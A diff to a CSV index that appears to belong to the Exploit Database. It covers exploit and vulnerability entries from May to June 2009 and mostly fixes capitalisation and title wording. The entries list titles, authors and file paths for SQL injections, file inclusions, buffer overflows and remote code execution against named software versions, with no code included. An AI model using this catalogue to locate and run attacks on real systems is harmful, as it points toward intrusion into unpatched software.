+8753,platforms/osx/remote/8753.txt,"Apple Mac OS X - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0 +8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0 -8756,platforms/asp/webapps/8756.txt,"asp inline corporate Calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 -8757,platforms/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 -8758,platforms/windows/remote/8758.html,"ChinaGames - 'CGAgent.dll' ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 +8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 +8757,platforms/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution",2009-05-21,etirah,windows,remote,0 +8758,platforms/windows/remote/8758.html,"ChinaGames - 'CGAgent.dll' ActiveX Remote Code Execution",2009-05-21,etirah,windows,remote,0 8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injections",2009-05-21,YEnH4ckEr,php,webapps,0 8761,platforms/php/webapps/8761.txt,"Article Directory - (Authentication Bypass) SQL Injection",2009-05-21,Hakxer,php,webapps,0 8762,platforms/php/webapps/8762.txt,"Article Directory - 'page.php' Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps,0 8763,platforms/php/webapps/8763.txt,"ZaoCMS - Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",php,webapps,0 8764,platforms/php/webapps/8764.txt,"ZaoCMS - 'download.php' Remote File Disclosure",2009-05-21,"ThE g0bL!N",php,webapps,0 -8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0 +8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0 8766,platforms/php/webapps/8766.txt,"Tutorial Share 3.5.0 - Insecure Cookie Handling",2009-05-22,Evil-Cod3r,php,webapps,0 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)",2009-05-22,n00b,windows,dos,0 8769,platforms/php/webapps/8769.txt,"ZaoCMS - (user_id) SQL Injection",2009-05-22,Qabandi,php,webapps,0 @@ -8288,8 +8289,8 @@ id,file,description,date,author,platform,type,port 8787,platforms/php/webapps/8787.txt,"MyFirstCMS 1.0.2 - Arbitrary File Delete",2009-05-26,darkjoker,php,webapps,0 8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script - 'profile.php user_id' SQL Injection",2009-05-26,Qabandi,php,webapps,0 8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0 -8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion Exploit",2009-05-26,StAkeR,php,webapps,0 -8791,platforms/php/webapps/8791.txt,"Wordpress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 +8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion",2009-05-26,StAkeR,php,webapps,0 +8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion",2009-05-26,asL-Sabia,php,webapps,0 8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Authentication Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0 8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox - (unclamped loop) Denial of Service",2009-05-26,"Thierry Zoller",multiple,dos,0 @@ -8303,13 +8304,13 @@ id,file,description,date,author,platform,type,port 8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - (Authentication Bypass) SQL Injection",2009-05-26,"ThE g0bL!N",php,webapps,0 8804,platforms/windows/remote/8804.py,"Soulseek 157 NS - Remote Buffer Overflow (SEH)",2009-05-26,His0k4,windows,remote,2242 8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0 -8806,platforms/windows/remote/8806.pl,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass (Perl) (2)",2009-05-26,ka0x,windows,remote,0 +8806,platforms/windows/remote/8806.pl,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Perl) (2)",2009-05-26,ka0x,windows,remote,0 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addAdminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0 8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - (addAdminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0 8811,platforms/php/webapps/8811.txt,"Joomla Component Com_Agora 3.0.0 RC1 - Remote File Upload",2009-05-26,ByALBAYX,php,webapps,0 -8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion Exploit",2009-05-26,Nine:Situations:Group,php,webapps,0 +8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion",2009-05-26,Nine:Situations:Group,php,webapps,0 8813,platforms/php/webapps/8813.txt,"Million Dollar Text Links 1.x - Insecure Cookie Handling",2009-05-27,HxH,php,webapps,0 8814,platforms/php/webapps/8814.txt,"Joomla Component AgoraGroup 0.3.5.3 - Blind SQL Injection",2009-05-27,"Chip d3 bi0s",php,webapps,0 8815,platforms/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - (fiche) Local File Inclusion",2009-05-27,"ThE g0bL!N",php,webapps,0 @@ -8323,7 +8324,7 @@ id,file,description,date,author,platform,type,port 8823,platforms/php/webapps/8823.txt,"WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - (SonicMediaPlayer.dll) Remote Buffer Overflow Exploit",2009-05-29,snakespc,windows,remote,0 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0 -8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos,0 +8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OS X/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos,0 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Authentication Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0 8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - (maincatid) SQL Injection",2009-05-29,Br0ly,php,webapps,0 @@ -8338,25 +8339,25 @@ id,file,description,date,author,platform,type,port 8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0 8839,platforms/php/webapps/8839.txt,"Open-school 1.0 - 'id' SQL Injection",2009-06-01,OzX,php,webapps,0 8840,platforms/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 - (tid) Blind SQL Injection",2009-06-01,OzX,php,webapps,0 -8841,platforms/php/webapps/8841.txt,"unclassified newsboard 1.6.4 - Multiple Vulnerabilities",2009-06-01,girex,php,webapps,0 +8841,platforms/php/webapps/8841.txt,"unclassified NewsBoard 1.6.4 - Multiple Vulnerabilities",2009-06-01,girex,php,webapps,0 8842,platforms/multiple/dos/8842.pl,"Apache mod_dav / svn - Remote Denial of Service",2009-06-01,kingcope,multiple,dos,0 8843,platforms/php/webapps/8843.pl,"Online Grades & Attendance 3.2.6 - Credentials Changer SQL Exploit",2009-06-01,YEnH4ckEr,php,webapps,0 8844,platforms/php/webapps/8844.txt,"Online Grades & Attendance 3.2.6 - Multiple SQL Injections",2009-06-01,YEnH4ckEr,php,webapps,0 8846,platforms/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,hardware,remote,0 8847,platforms/php/webapps/8847.txt,"Joomla Component Joomlaequipment 2.0.4 - (com_juser) SQL Injection",2009-06-01,"Chip d3 bi0s",php,webapps,0 8848,platforms/php/webapps/8848.txt,"ecsportal rel 6.5 - (article_view_photo.php id) SQL Injection",2009-06-01,taRentReXx,php,webapps,0 -8849,platforms/asp/webapps/8849.txt,"R2 Newsletter Lite/Pro/Stats - 'admin.mdb' Database Disclosure",2009-06-01,TiGeR-Dz,asp,webapps,0 +8849,platforms/asp/webapps/8849.txt,"R2 NewsLetter Lite/Pro/Stats - 'admin.mdb' Database Disclosure",2009-06-01,TiGeR-Dz,asp,webapps,0 8850,platforms/php/webapps/8850.txt,"PAD Site Scripts 3.6 - Arbitrary Database Backup",2009-06-01,TiGeR-Dz,php,webapps,0 8851,platforms/php/webapps/8851.txt,"AdaptBB 1.0 - (forumspath) Remote File Inclusion",2009-06-01,"Mehmet Ince",php,webapps,0 8852,platforms/php/webapps/8852.txt,"ASP Football Pool 2.3 - Remote Database Disclosure",2009-06-01,ByALBAYX,php,webapps,0 8853,platforms/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 - Multiple Local File Inclusion",2009-06-02,YEnH4ckEr,php,webapps,0 8854,platforms/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 - Blind SQL Injection",2009-06-02,YEnH4ckEr,php,webapps,0 -8855,platforms/php/webapps/8855.txt,"AlstraSoft Article Manager Pro - Arbitrary File Upload",2009-06-02,ZoRLu,php,webapps,0 +8855,platforms/php/webapps/8855.txt,"Alstrasoft Article Manager Pro - Arbitrary File Upload",2009-06-02,ZoRLu,php,webapps,0 8856,platforms/php/webapps/8856.txt,"flashlight free edition - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-06-02,K4m1k451,php,webapps,0 8857,platforms/php/webapps/8857.txt,"WebCal - 'webCal3_detail.asp event_id' SQL Injection",2009-06-02,Bl@ckbe@rD,php,webapps,0 8858,platforms/php/webapps/8858.txt,"propertymax pro free - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-02,SirGod,php,webapps,0 8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0 -8860,platforms/php/webapps/8860.txt,"podcast generator 1.2 - globals[] Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 +8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - GLOBALS[] Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 - (ITMS) Multiple Protocol Handler Buffer Overflow Exploit (Metasploit)",2009-06-03,"Will Drewry",osx,remote,0 8862,platforms/windows/dos/8862.txt,"Apple QuickTime - Image Description Atom Sign Extension (PoC)",2009-06-03,webDEViL,windows,dos,0 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 @@ -8390,7 +8391,7 @@ id,file,description,date,author,platform,type,port 8893,platforms/php/webapps/8893.txt,"Virtue Book Store - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 -8896,platforms/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0 +8896,platforms/osx/local/8896.c,"Apple Mac OS X xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0 8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 8898,platforms/php/webapps/8898.txt,"Joomla Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps,0 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0 @@ -8398,7 +8399,7 @@ id,file,description,date,author,platform,type,port 8901,platforms/php/webapps/8901.txt,"virtue news - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-08,snakespc,php,webapps,0 8902,platforms/php/webapps/8902.htm,"Grestul 1.2 - Remote Add Administrator Account Exploit",2009-06-08,"ThE g0bL!N",php,webapps,0 8903,platforms/php/webapps/8903.txt,"DM FileManager 3.9.2 - Insecure Cookie Handling",2009-06-08,"ThE g0bL!N",php,webapps,0 -8904,platforms/php/webapps/8904.txt,"automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,php,webapps,0 +8904,platforms/php/webapps/8904.txt,"Automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,php,webapps,0 8905,platforms/php/webapps/8905.txt,"Joomla Component com_portafolio - 'cid' SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 8906,platforms/php/webapps/8906.pl,"Shop Script Pro 2.12 - SQL Injection",2009-06-08,Ams,php,webapps,0 8907,platforms/multiple/remote/8907.txt,"Apple Safari 3.2.x - (XXE attack) Local File Theft",2009-06-09,"Chris Evans",multiple,remote,0 @@ -8407,19 +8408,19 @@ id,file,description,date,author,platform,type,port 8912,platforms/php/webapps/8912.txt,"Joomla Component com_media_library 1.5.3 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8913,platforms/php/webapps/8913.txt,"S-CMS 2.0b3 - Multiple Local File Inclusion",2009-06-09,YEnH4ckEr,php,webapps,0 8914,platforms/php/webapps/8914.txt,"S-CMS 2.0b3 - Multiple SQL Injections",2009-06-09,YEnH4ckEr,php,webapps,0 -8915,platforms/php/webapps/8915.pl,"S-CMS 2.0b3 - (username) Blind SQL Injection",2009-06-09,YEnH4ckEr,php,webapps,0 +8915,platforms/php/webapps/8915.pl,"S-CMS 2.0b3 - 'username' Blind SQL Injection",2009-06-09,YEnH4ckEr,php,webapps,0 8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - (Control Server) Remote Buffer Overflow Exploit",2009-06-09,His0k4,windows,remote,80 8917,platforms/php/webapps/8917.txt,"mrcgiguy the ticket system 2.0 PHP - Multiple Vulnerabilities",2009-06-09,"ThE g0bL!N",php,webapps,0 8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links - 'report.php id' SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0 8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 -8921,platforms/php/webapps/8921.sh,"PHPMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0 +8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0 8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0 -8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - system Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0 +8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0 8924,platforms/php/webapps/8924.txt,"School Data Navigator - (page) Local / Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps,0 8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - (Cookie Handling / SQL Injection) Multiple Vulnerabilities",2009-06-10,"ThE g0bL!N",php,webapps,0 -8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 - (username) Blind SQL Injection",2009-06-10,YEnH4ckEr,php,webapps,0 +8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 - 'username' Blind SQL Injection",2009-06-10,YEnH4ckEr,php,webapps,0 8928,platforms/php/webapps/8928.txt,"PHPWebThings 1.5.2 - (help.php module) Local File Inclusion",2009-06-11,Br0ly,php,webapps,0 8929,platforms/php/webapps/8929.txt,"Splog 1.2 Beta - Multiple SQL Injections",2009-06-11,YEnH4ckEr,php,webapps,0 8930,platforms/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",windows,remote,0 @@ -8438,7 +8439,7 @@ id,file,description,date,author,platform,type,port 8943,platforms/php/webapps/8943.txt,"translucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail 3.2.0-1.8 - Remote File / Overwrite",2009-06-12,GoLd_M,php,webapps,0 8946,platforms/php/webapps/8946.txt,"Joomla Component com_Projectfork 2.0.10 - Local File Inclusion",2009-06-15,ByALBAYX,php,webapps,0 -8947,platforms/php/webapps/8947.txt,"impleo music collection 2.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 +8947,platforms/php/webapps/8947.txt,"impleo music Collection 2.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 - (top) Remote File Inclusion",2009-06-15,Br0ly,php,webapps,0 8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,php,webapps,0 8950,platforms/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0 @@ -8448,11 +8449,11 @@ id,file,description,date,author,platform,type,port 8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - (syslog) Denial of Service",2009-06-15,h00die,linux,dos,0 8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 - Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0 -8957,platforms/multiple/dos/8957.txt,"Apple Safari & Quicktime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0 +8957,platforms/multiple/dos/8957.txt,"Apple Safari & QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0 8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 8959,platforms/php/webapps/8959.pl,"Joomla Component com_ijoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash Exploit",2009-06-15,webDEViL,linux,dos,0 -8961,platforms/php/webapps/8961.txt,"Wordpress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps,0 +8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps,0 8962,platforms/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - (listing_view.php itemnr) SQL Injection",2009-06-15,SirGod,php,webapps,0 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote,0 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0 @@ -8463,16 +8464,16 @@ id,file,description,date,author,platform,type,port 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,windows,remote,0 8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 - naPolicyManager.dll ActiveX Arbitrary Data Write",2009-06-16,callAX,windows,remote,0 8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,windows,dos,0 -8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - Remote File Disclosure (.htaccess)",2009-06-16,daath,php,webapps,0 +8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - (.htaccess) Remote File Disclosure",2009-06-16,daath,php,webapps,0 8975,platforms/php/webapps/8975.txt,"PHPFK 7.03 - (page_bottom.php) Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0 8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server - Low Bandwidth Denial of Service (slowloris.pl)",2009-06-17,RSnake,multiple,dos,0 8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,php,webapps,0 -8978,platforms/php/webapps/8978.txt,"fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)",2009-06-17,StAkeR,php,webapps,0 +8978,platforms/php/webapps/8978.txt,"Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)",2009-06-17,StAkeR,php,webapps,0 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion",2009-06-17,YEnH4ckEr,php,webapps,0 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0 8981,platforms/php/webapps/8981.txt,"phportal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 8982,platforms/linux/dos/8982.txt,"compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,linux,dos,0 -8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - dlpcrypt.sys Local Kernel Ring0 Code Execution Exploit",2009-06-18,mu-b,windows,local,0 +8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - dlpcrypt.sys Local Kernel Ring0 Code Execution",2009-06-18,mu-b,windows,local,0 8984,platforms/php/webapps/8984.txt,"cms buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote,0 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0 @@ -8485,12 +8486,12 @@ id,file,description,date,author,platform,type,port 8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusion",2009-06-22,CraCkEr,php,webapps,0 8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure",2009-06-22,Lo$er,php,webapps,0 8997,platforms/php/webapps/8997.txt,"kasseler CMS - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-22,S(r1pt,php,webapps,0 -8998,platforms/php/webapps/8998.txt,"Sourcebans 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps,0 +8998,platforms/php/webapps/8998.txt,"SourceBans 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps,0 8999,platforms/php/webapps/8999.txt,"Joomla Component com_tickets 2.1 - 'id' SQL Injection",2009-06-22,"Chip d3 bi0s",php,webapps,0 9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 - (key) SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps,0 -9001,platforms/php/webapps/9001.php,"MyBB 1.4.6 - Remote Code Execution Exploit",2009-06-22,The:Paradox,php,webapps,0 +9001,platforms/php/webapps/9001.php,"MyBB 1.4.6 - Remote Code Execution",2009-06-22,The:Paradox,php,webapps,0 9002,platforms/windows/remote/9002.c,"Bopup Communications Server 3.2.26.5460 - Remote SYSTEM Exploit",2009-06-22,mu-b,windows,remote,19810 -9004,platforms/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution Exploit",2009-06-23,BlackH,php,webapps,0 +9004,platforms/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution",2009-06-23,BlackH,php,webapps,0 9005,platforms/php/webapps/9005.py,"Zen Cart 1.3.8 - SQL Execution Exploit",2009-06-23,BlackH,php,webapps,0 9006,platforms/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos Exploit",2009-06-23,Nibin,windows,dos,0 9007,platforms/windows/dos/9007.rb,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos (Metasploit)",2009-06-23,Nibin,windows,dos,0 @@ -8519,25 +8520,25 @@ id,file,description,date,author,platform,type,port 9031,platforms/windows/remote/9031.py,"Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow Exploit (SEH)",2009-06-29,His0k4,windows,remote,19810 9032,platforms/php/webapps/9032.txt,"osTicket 1.6 RC4 - Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",php,webapps,0 9033,platforms/windows/dos/9033.pl,"SCMPX 1.5.1 - '.m3u' Local Heap Overflow (PoC)",2009-06-29,hack4love,windows,dos,0 -9034,platforms/windows/local/9034.pl,"HT-MP3Player 1.0 - (.ht3) Local Buffer Overflow (SEH)",2009-06-29,hack4love,windows,local,0 +9034,platforms/windows/local/9034.pl,"HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)",2009-06-29,hack4love,windows,local,0 9035,platforms/php/webapps/9035.txt,"Almnzm - (COOKIE: customer) SQL Injection",2009-06-29,Qabandi,php,webapps,0 9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0 9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 -9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - (.ht3) Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0 -9039,platforms/multiple/remote/9039.txt,"Cpanel - (lastvisit.html domain) Arbitrary File Disclosure (Post-Authenticated)",2009-06-29,SecurityRules,multiple,remote,0 +9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0 +9039,platforms/multiple/remote/9039.txt,"Cpanel - (Post-Authentication) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0 9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0 9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 -9042,platforms/php/webapps/9042.pl,"Newsolved 1.1.6 - (login grabber) Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0 -9043,platforms/php/webapps/9043.txt,"Wordpress Plugin DM Albums 1.9.2 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 -9044,platforms/php/webapps/9044.txt,"dm filemanager 3.9.4 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 +9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - (login grabber) Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0 +9043,platforms/php/webapps/9043.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 +9044,platforms/php/webapps/9044.txt,"dm FileManager 3.9.4 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 9047,platforms/windows/local/9047.pl,"TFM MMPlayer 2.0 - (m3u/ppl) Universal Buffer Overflow (SEH)",2009-06-30,"ThE g0bL!N",windows,local,0 -9048,platforms/php/webapps/9048.txt,"Wordpress Plugin DM Albums 1.9.2 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 